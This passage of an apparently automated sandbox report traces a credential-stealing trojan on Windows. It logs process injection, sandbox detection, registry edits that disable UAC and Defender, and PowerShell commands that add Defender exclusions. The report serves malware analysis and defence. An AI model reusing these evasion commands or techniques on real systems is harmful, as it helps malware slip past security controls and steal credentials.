WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: 0 HX häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsCIty WIJv(CompanyNameMUC8FileDescriptionCZO JZt0FileVersion0.3.6.2: InternalNameNQyc QPy.exez+LegalCopyrightCopyright 2020 © TBq. All rights reserved.2LegalTrademarksIwOGB OriginalFilenameNQyc QPy.exe2 ProductNameNQyc QPy4ProductVersion8.8.7.68Assembly Version8.8.7.6DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x0040a000 process_identifier: 1048 process_handle: 0x00000784	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: ; base_address: 0x0040c000 process_identifier: 1048 process_handle: 0x00000784	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 1048 process_handle: 0x00000784	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELPÅ`àl @ à@ÈS ÀÀ H.text$k l `.rsrcÀ n@@.relocÀr@B base_address: 0x00400000 process_identifier: 3600 process_handle: 0x00000770	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: 0 HX häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsCIty WIJv(CompanyNameMUC8FileDescriptionCZO JZt0FileVersion0.3.6.2: InternalNameNQyc QPy.exez+LegalCopyrightCopyright 2020 © TBq. All rights reserved.2LegalTrademarksIwOGB OriginalFilenameNQyc QPy.exe2 ProductNameNQyc QPy4ProductVersion8.8.7.68Assembly Version8.8.7.6DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x0040a000 process_identifier: 3600 process_handle: 0x00000770	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: ; base_address: 0x0040c000 process_identifier: 3600 process_handle: 0x00000770	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3600 process_handle: 0x00000770	1	1

Code injection by writing an executable or DLL to the memory of another process (9 events)

Time & API	Arguments	Status	Return
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÆ`à8ø¾W `@ pWK`À H.textÄ7 8 `.sdataÁð`ò<@À.rsrcÀ`.@@.reloc2@B base_address: 0x00400000 process_identifier: 2576 process_handle: 0x000007e0	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÆ`à8ø¾W `@ pWK`À H.textÄ7 8 `.sdataÁð`ò<@À.rsrcÀ`.@@.reloc2@B base_address: 0x00400000 process_identifier: 8508 process_handle: 0x0000076c	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!PELù½O[à²ÊaÐ@@ð.textÛ±² `.dataÐ¶@À.rsrcð¸@@.relocº@B base_address: 0x00400000 process_identifier: 2488 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à hS$0@pjí 10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ @0@.bssf°`À.edata1 @0@.idataä0@0À.rsrcÀP¤@@.relocô `¨@0B base_address: 0x00400000 process_identifier: 3472 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!PELù½O[à²ÊaÐ@@ð.textÛ±² `.dataÐ¶@À.rsrcð¸@@.relocº@B base_address: 0x00400000 process_identifier: 5808 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à hS$0@pjí 10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ @0@.bssf°`À.edata1 @0@.idataä0@0À.rsrcÀP¤@@.relocô `¨@0B base_address: 0x00400000 process_identifier: 6452 process_handle: 0x00000774	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELPÅ`àl @ à@ÈS ÀÀ H.text$k l `.rsrcÀ n@@.relocÀr@B base_address: 0x00400000 process_identifier: 5484 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELPÅ`àl @ à@ÈS ÀÀ H.text$k l `.rsrcÀ n@@.relocÀr@B base_address: 0x00400000 process_identifier: 1048 process_handle: 0x00000784	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELPÅ`àl @ à@ÈS ÀÀ H.text$k l `.rsrcÀ n@@.relocÀr@B base_address: 0x00400000 process_identifier: 3600 process_handle: 0x00000770	1	1

Collects information about installed applications (1 event)

Time & API	Arguments	Status	Return	Repeated
RegQueryValueExA June 21, 2021, 12:58 p.m.	key_handle: 0x000000b8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1	0	0

File has been identified by 13 AntiVirus engines on VirusTotal as malicious (13 events)

MicroWorld-eScan	Trojan.GenericKD.46522298
FireEye	Generic.mg.34b2d327ebe6246d
Sangfor	Trojan.Win32.Save.a
Cyren	W32/MSIL_Agent.BZW.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Avast	Win32:MalwareX-gen [Trj]
Kaspersky	UDS:Trojan-Downloader.MSIL.Foold.gen
Ad-Aware	Trojan.GenericKD.46522298
SentinelOne	Static AI - Malicious PE
MAX	malware (ai score=86)
Microsoft	Trojan:Win32/AgentTesla!ml
AVG	Win32:MalwareX-gen [Trj]

Harvests credentials from local email clients (2 events)

file	C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
registry	HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (30 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 8024 called NtSetContextThread to modify thread in remote process 2576
Process injection	Process 2224 called NtSetContextThread to modify thread in remote process 8508
Process injection	Process 2576 called NtSetContextThread to modify thread in remote process 2488
Process injection	Process 2488 called NtSetContextThread to modify thread in remote process 6664
Process injection	Process 2488 called NtSetContextThread to modify thread in remote process 1132
Process injection	Process 2488 called NtSetContextThread to modify thread in remote process 8384
Process injection	Process 2488 called NtSetContextThread to modify thread in remote process 4408
Process injection	Process 2488 called NtSetContextThread to modify thread in remote process 532
Process injection	Process 8684 called NtSetContextThread to modify thread in remote process 3472
Process injection	Process 8508 called NtSetContextThread to modify thread in remote process 5808
Process injection	Process 5808 called NtSetContextThread to modify thread in remote process 6852
Process injection	Process 1828 called NtSetContextThread to modify thread in remote process 6452
Process injection	Process 8548 called NtSetContextThread to modify thread in remote process 5484
Process injection	Process 4376 called NtSetContextThread to modify thread in remote process 1048
Process injection	Process 8680 called NtSetContextThread to modify thread in remote process 3600
NtSetContextThread June 21, 2021, 12:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4282302 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000007e4 process_identifier: 2576	1	0	0
NtSetContextThread June 21, 2021, 12:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4282302 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000770 process_identifier: 8508	1	0	0
NtSetContextThread June 21, 2021, 12:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4219338 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000220 process_identifier: 2488	1	0	0
NtSetContextThread June 21, 2021, 12:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 745609 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000ac process_identifier: 6664	1	0	0
NtSetContextThread June 21, 2021, 12:58 p.m.	registers.eip: 2000355780 registers.esp: 3145228 registers.edi: 0 registers.eax: 4471546 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000ec process_identifier: 1132	1	0	0
NtSetContextThread June 21, 2021, 12:58 p.m.	registers.eip: 2000355780 registers.esp: 3799500 registers.edi: 0 registers.eax: 4212102 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000025c process_identifier: 8384	1	0	0
NtSetContextThread June 21, 2021, 12:58 p.m.	registers.eip: 2000355780 registers.esp: 2161504 registers.edi: 0 registers.eax: 4577933 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000244 process_identifier: 4408	1	0	0
NtSetContextThread June 21, 2021, 12:58 p.m.	registers.eip: 2000355780 registers.esp: 3733844 registers.edi: 0 registers.eax: 4738523 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000240 process_identifier: 532	1	0	0
NtSetContextThread June 21, 2021, 12:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4203603 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000007e0 process_identifier: 3472	1	0	0
NtSetContextThread June 21, 2021, 12:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4219338 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000220 process_identifier: 5808	1	0	0
NtSetContextThread June 21, 2021, 12:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 1007753 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000b4 process_identifier: 6852	1	0	0
NtSetContextThread June 21, 2021, 12:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4203603 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000778 process_identifier: 6452	1	0	0
NtSetContextThread June 21, 2021, 12:58 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4229918 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000007e0 process_identifier: 5484	1	0	0
NtSetContextThread June 21, 2021, 12:58 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4229918 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000788 process_identifier: 1048	1	0	0
NtSetContextThread June 21, 2021, 12:58 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4229918 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000077c process_identifier: 3600	1	0	0

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 225 events)

file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.4104.46674796
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2c8333e.TMP
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.4104.46674796
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.4104.46674796
file	C:\Users\test22\AppData\Local\Temp\sx_win_bin.tmp
file	C:\ProgramData\svchost.exe
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.6684.46762656
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.6684.46762656
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.6684.46762656
file	C:\Users\test22\AppData\Local\Temp\:Zone.Identifier
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2320.46695484
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2320.46695484
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2c8840d.TMP
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2320.46695484
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3940.46773125
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2c9b375.TMP
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3940.46773125
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3940.46773125
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2c9affa.TMP
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.6208.46772281
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.6208.46772281
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.6208.46772281
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3148.46691875
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3148.46691875
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3148.46691875
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2c87603.TMP
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.6584.46763468
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2c98dbd.TMP
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.6584.46763468
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.6584.46763468
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2132.46683203
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2132.46683203
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2132.46683203
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2c853d5.TMP
file	C:\Users\test22\AppData\Local\嬍嬑嫠嬎嫥嫜嫡嬠嫝嫰嬏嫜嬞嬠嬛嬓嬏嫠嬐嬒嬆嬏嫞嫸嬎\SHSPFVNKVD.exe_Url_elc21nrgllsua2q3bepxtj3c2sciqivl\2.83.401.65\3thve3l4.newcfg
file	C:\Users\test22\AppData\Local\嬍嬑嫠嬎嫥嫜嫡嬠嫝嫰嬏嫜嬞嬠嬛嬓嬏嫠嬐嬒嬆嬏嫞嫸嬎\SHSPFVNKVD.exe_Url_elc21nrgllsua2q3bepxtj3c2sciqivl\2.83.401.65\z02yw0q2.newcfg
file	C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\AdvancedRun.exe
file	C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\test.bat
file	C:\Users\test22\AppData\Local\嬍嬑嫠嬎嫥嫜嫡嬠嫝嫰嬏嫜嬞嬠嬛嬓嬏嫠嬐嬒嬆嬏嫞嫸嬎\SHSPFVNKVD.exe_Url_elc21nrgllsua2q3bepxtj3c2sciqivl\2.83.401.65\3thve3l4.tmp
file	C:\Users\test22\AppData\Local\嬍嬑嫠嬎嫥嫜嫡嬠嫝嫰嬏嫜嬞嬠嬛嬓嬏嫠嬐嬒嬆嬏嫞嫸嬎\SHSPFVNKVD.exe_Url_elc21nrgllsua2q3bepxtj3c2sciqivl\2.83.401.65\z02yw0q2.tmp
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2c854a0.TMP
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.5236.46683312
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.5236.46683312
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.5236.46683312
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2696.46693421
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2c87c0e.TMP
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2696.46693421
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2696.46693421
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.8844.46765203
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.8844.46765187

Attempts to remove evidence of file being downloaded from the Internet (1 event)

file	C:\Users\test22\AppData\Local\Temp\:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (30 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 8024 resumed a thread in remote process 2576
Process injection	Process 2224 resumed a thread in remote process 8508
Process injection	Process 2576 resumed a thread in remote process 2488
Process injection	Process 2488 resumed a thread in remote process 6664
Process injection	Process 2488 resumed a thread in remote process 1132
Process injection	Process 2488 resumed a thread in remote process 8384
Process injection	Process 2488 resumed a thread in remote process 4408
Process injection	Process 2488 resumed a thread in remote process 532
Process injection	Process 8684 resumed a thread in remote process 3472
Process injection	Process 8508 resumed a thread in remote process 5808
Process injection	Process 5808 resumed a thread in remote process 6852
Process injection	Process 1828 resumed a thread in remote process 6452
Process injection	Process 8548 resumed a thread in remote process 5484
Process injection	Process 4376 resumed a thread in remote process 1048
Process injection	Process 8680 resumed a thread in remote process 3600
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x000007e4 suspend_count: 1 process_identifier: 2576	1	0	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000770 suspend_count: 1 process_identifier: 8508	1	0	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 2488	1	0	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x000000ac suspend_count: 1 process_identifier: 6664	1	0	0
NtResumeThread June 21, 2021, 12:58 p.m.	thread_handle: 0x000000ec suspend_count: 1 process_identifier: 1132	1	0	0
NtResumeThread June 21, 2021, 12:58 p.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 8384	1	0	0
NtResumeThread June 21, 2021, 12:58 p.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 4408	1	0	0
NtResumeThread June 21, 2021, 12:58 p.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 532	1	0	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x000007e0 suspend_count: 1 process_identifier: 3472	1	0	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 5808	1	0	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x000000b4 suspend_count: 1 process_identifier: 6852	1	0	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000778 suspend_count: 1 process_identifier: 6452	1	0	0
NtResumeThread June 21, 2021, 12:58 p.m.	thread_handle: 0x000007e0 suspend_count: 1 process_identifier: 5484	1	0	0
NtResumeThread June 21, 2021, 12:58 p.m.	thread_handle: 0x00000788 suspend_count: 1 process_identifier: 1048	1	0	0
NtResumeThread June 21, 2021, 12:58 p.m.	thread_handle: 0x0000077c suspend_count: 1 process_identifier: 3600	1	0	0

Creates known SpyNet files, registry changes and/or mutexes. (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Spynet

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe

Detects VirtualBox through the presence of a file (8 events)

file	C:\Windows\System32\vboxdisp.dll
file	C:\Windows\System32\vboxhook.dll
file	C:\Windows\System32\vboxmrxnp.dll
file	C:\Windows\System32\VBoxOGL.dll
file	C:\Windows\System32\drivers\VBoxSF.sys
file	C:\Windows\System32\drivers\VBoxGuest.sys
file	C:\Windows\System32\drivers\VBoxMouse.sys
file	C:\Windows\System32\drivers\VBoxVideo.sys

Detects VirtualBox through the presence of a registry key (4 events)

registry	HKEY_LOCAL_MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions
registry	HKEY_LOCAL_MACHINE\HARDWARE\ACPI\FADT\VBOX__
registry	HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
registry	HKEY_LOCAL_MACHINE\HARDWARE\ACPI\RSDT\VBOX__

Detects VirtualBox through the presence of a window (4 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowW June 21, 2021, 12:57 p.m.	class_name: VBoxTrayToolWndClass window_name:		0	0
FindWindowW June 21, 2021, 12:57 p.m.	class_name: #0 window_name: VBoxTrayToolWnd		0	0
FindWindowW June 21, 2021, 12:57 p.m.	class_name: VBoxTrayToolWndClass window_name:		0	0
FindWindowW June 21, 2021, 12:57 p.m.	class_name: #0 window_name: VBoxTrayToolWnd		0	0

Detects VMWare through the presence of various files (2 events)

file	C:\Windows\System32\drivers\vmmouse.sys
file	C:\Windows\System32\drivers\vmhgfs.sys

Detects VMWare through the presence of a registry key (2 events)

registry	HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools
registry	HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Workstation

Generates some ICMP traffic

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

95.90.186.169:3606

Disables Windows Security features (5 events)

description	attempts to disable user access control	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable

Executed a process and injected code into it, probably while unpacking (50 out of 577 events)

Time & API	Arguments	Status	Return
NtResumeThread June 21, 2021, 12:56 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 8024	1	0
NtResumeThread June 21, 2021, 12:56 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 8024	1	0
NtResumeThread June 21, 2021, 12:56 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 8024	1	0
NtResumeThread June 21, 2021, 12:56 p.m.	thread_handle: 0x0000058c suspend_count: 1 process_identifier: 8024	1	0
NtResumeThread June 21, 2021, 12:56 p.m.	thread_handle: 0x000005dc suspend_count: 1 process_identifier: 8024	1	0
NtGetContextThread June 21, 2021, 12:56 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread June 21, 2021, 12:56 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread June 21, 2021, 12:56 p.m.	thread_handle: 0x000000e0	1	0
NtSetContextThread June 21, 2021, 12:56 p.m.	registers.eip: 1874996100 registers.esp: 3927912 registers.edi: 1233955 registers.eax: 31 registers.ebp: 3927956 registers.edx: 35296796 registers.ebx: 52073200 registers.esi: 35296620 registers.ecx: 233 thread_handle: 0x000000e0 process_identifier: 8024	1	0
NtResumeThread June 21, 2021, 12:56 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 8024	1	0
NtGetContextThread June 21, 2021, 12:56 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread June 21, 2021, 12:56 p.m.	thread_handle: 0x000000e0	1	0
NtResumeThread June 21, 2021, 12:56 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 8024	1	0
NtResumeThread June 21, 2021, 12:56 p.m.	thread_handle: 0x0000043c suspend_count: 1 process_identifier: 8024	1	0
CreateProcessInternalW June 21, 2021, 12:56 p.m.	thread_identifier: 7636 thread_handle: 0x0000066c process_identifier: 6928 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run filepath_r: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000670	1	1
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000654 suspend_count: 1 process_identifier: 8024	1	0
CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 4772 thread_handle: 0x000006c8 process_identifier: 3916 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006dc	1	1
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x000006dc suspend_count: 1 process_identifier: 8024	1	0
CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 2196 thread_handle: 0x000006f0 process_identifier: 7552 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000708	1	1
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x000006f4 suspend_count: 1 process_identifier: 8024	1	0
